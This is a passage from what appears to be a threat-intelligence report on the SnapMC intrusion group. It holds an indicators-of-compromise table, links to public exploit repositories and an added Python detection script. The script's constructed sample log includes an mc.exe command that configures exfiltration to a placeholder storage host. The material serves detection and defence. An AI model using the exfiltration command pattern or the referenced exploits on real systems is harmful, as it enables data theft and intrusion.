  Exfiltration | T1567 – Exfiltration over Web Service; T1567.002 – Exfiltration to Cloud Storage | SnapMC used the MinIO client (mc.exe) to exfiltrate data.

Indicators of Compromise

  Type | Data | Notes
  File location + file name | C:\Windows\Temp\[0-9]{10}.[0-9]{1,8}.dll (example: c:\Windows\Temp\1628862598.87034184.dll) | File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and the last part is randomly generated
  File location + file name | C:\Windows\Temp\7za.exe | 7zip archiving utility
  File name | s.ps1 | SQL cmdlet
  File name | a.ps1 | SQL cmdlet
  File name | x.ps1 | SQL cmdlet
  File name | *.par.minio | Temporary files created by MinIO during exfiltration
  File location | C:\Windows\Temp\Azure\ | Folder for temporary files created by MinIO
  File location | C:\Windows\Temp\Vmware\ | Folder for temporary files created by MinIO
  File name | mc.exe | MinIO client
  Hash | 651ed548d2e04881d0ff24f789767c0e | MD5 hash of MinIO client
  Hash | b4171d48df233978f8cf58081b8ad9dc51a6097f | SHA1 hash of MinIO client
  Hash | 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e | SHA256 hash of MinIO client

References
  1. https://nvd.nist.gov/vuln/detail/CVE-2019-18935
  2. https://github.com/noperator/CVE-2019-18935
  3. https://github.com/calebstewart/CVE-2021-1675
  4. https://github.com/d0nkeys/redteam/tree/master/privilege-escalation
  5. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/
  6. https://github.com/gushmazuko/WinBypass
  7. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/
  8. https://min.io/
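The indicators in the table above and the mc.exe command lines quoted in the exfiltration section, turned into a small hunt over process-creation and file-creation telemetry. This is an added example, not code from NCC Group or from the post: the pipe-delimited log format, its field names (Image, CommandLine, TargetFilename, MD5) and every sample line are constructed for it, while the hashes, paths, file names, the Temp DLL naming pattern and the ATT&CK IDs it reports are the ones given on the page.

```python
import re

# Indicator values below (hashes, paths, file names, the Temp DLL naming pattern)
# are taken from the SnapMC IoC table; the log lines further down are constructed
# for this example and are not real telemetry.
MINIO_CLIENT_HASHES = {
    "651ed548d2e04881d0ff24f789767c0e",                                  # MD5
    "b4171d48df233978f8cf58081b8ad9dc51a6097f",                          # SHA1
    "0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e",  # SHA256
}
# Dropped Telerik payload: 10-digit epoch timestamp, dot, 1-8 random digits, .dll
TELERIK_DROP_RE = re.compile(r"^c:\\windows\\temp\\[0-9]{10}\.[0-9]{1,8}\.dll$", re.I)
SEVENZIP_RE = re.compile(r"^c:\\windows\\temp\\7za\.exe$", re.I)
# s.ps1 / a.ps1 / x.ps1 appearing as its own token or path element on a command line
SQL_SCRIPT_RE = re.compile(r"(?:^|[\\\s])[sax]\.ps1\b", re.I)
# mc.exe run with --config-dir under a Temp folder and --insecure, as in the quoted commands
MC_CMDLINE_RE = re.compile(
    r"mc\.exe\s.*--config-dir\s+\S*\\temp\\\S*\s.*--insecure\s+(?:alias\s+set|cp)\b", re.I)
MINIO_TEMP_RE = re.compile(r"\.par\.minio$", re.I)
MINIO_WORK_DIRS = ("c:\\windows\\temp\\azure\\", "c:\\windows\\temp\\vmware\\")


def parse_event(line):
    """Parse one 'timestamp|EventType|Key=Value|...' line (constructed export format)."""
    ts, etype, *kvs = line.rstrip("\n").split("|")
    event = {"ts": ts, "type": etype}
    for kv in kvs:
        key, _, value = kv.partition("=")   # split on the first '=' only
        event[key.strip().lower()] = value.strip()
    return event


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return (technique, reason) pairs for one event; empty list if nothing matches."""
    hits = []
    if ev["type"] == "ProcessCreate":
        image, cmd = ev.get("image", ""), ev.get("commandline", "")
        hashes = {ev.get(k, "").lower() for k in ("md5", "sha1", "sha256")}
        if hashes & MINIO_CLIENT_HASHES:
            hits.append(("T1567.002", "process hash matches known MinIO client"))
        elif basename(image) == "mc.exe":
            hits.append(("T1567.002", "mc.exe executed (MinIO client file name)"))
        if MC_CMDLINE_RE.search(cmd):
            hits.append(("T1567.002", "mc.exe --insecure alias set/cp with config dir under Temp"))
        if SEVENZIP_RE.match(image):
            hits.append(("T1560.001", "7za.exe staged in C:\\Windows\\Temp"))
        if SQL_SCRIPT_RE.search(cmd):
            hits.append(("T1059.001", "SQL export script name (s/a/x.ps1) on command line"))
    elif ev["type"] == "FileCreate":
        path = ev.get("targetfilename", "").lower()
        if TELERIK_DROP_RE.match(path):
            hits.append(("T1190", "Telerik post-exploitation DLL naming pattern in Temp"))
        if MINIO_TEMP_RE.search(path) or path.startswith(MINIO_WORK_DIRS):
            hits.append(("T1567.002", "MinIO temporary file or working directory"))
        if basename(path) in ("s.ps1", "a.ps1", "x.ps1"):
            hits.append(("T1059.001", "SQL export script dropped"))
    return hits


def hunt(lines):
    """Run every rule over the log lines; returns one finding dict per rule hit."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for technique, reason in classify(ev):
            findings.append({"ts": ev["ts"], "technique": technique, "reason": reason,
                             "evidence": ev.get("commandline") or ev.get("targetfilename", "")})
    return findings


def techniques_seen(findings):
    """Distinct ATT&CK technique IDs in first-seen order, for a quick triage summary."""
    return list(dict.fromkeys(f["technique"] for f in findings))


# Constructed sample telemetry mirroring the SnapMC chain (not real data).
SAMPLE_LOG = r"""
2021-08-13T14:29:58Z|FileCreate|Image=C:\Windows\System32\inetsrv\w3wp.exe|TargetFilename=C:\Windows\Temp\1628862598.87034184.dll
2021-08-13T14:31:02Z|ProcessCreate|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\Windows\Temp\a.ps1
2021-08-13T14:40:10Z|ProcessCreate|Image=C:\Windows\Temp\7za.exe|CommandLine=7za.exe a export.7z *.csv
2021-08-13T14:45:33Z|ProcessCreate|Image=C:\Windows\Temp\mc.exe|CommandLine=C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set exfil https://storage.example.invalid KEY SECRET|MD5=651ed548d2e04881d0ff24f789767c0e
2021-08-13T14:46:01Z|FileCreate|Image=C:\Windows\Temp\mc.exe|TargetFilename=C:\Windows\Temp\vmware\export.7z.abc123.par.minio
2021-08-13T15:00:00Z|ProcessCreate|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\admin\notes.txt
""".strip().splitlines()

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['ts']} {f['technique']:<10} {f['reason']}: {f['evidence']}")
```

Running the block prints one line per rule hit; against the sample it reports six hits covering T1190, T1059.001, T1560.001 and T1567.002, and nothing for the notepad event. The parse step stands in for whatever a SIEM or Sysmon export provides. Note that only the hash rule survives a renamed binary or a different working directory, so the file-name and path rules are best treated as low-cost corroboration around the hash and command-line matches rather than as stand-alone alerts.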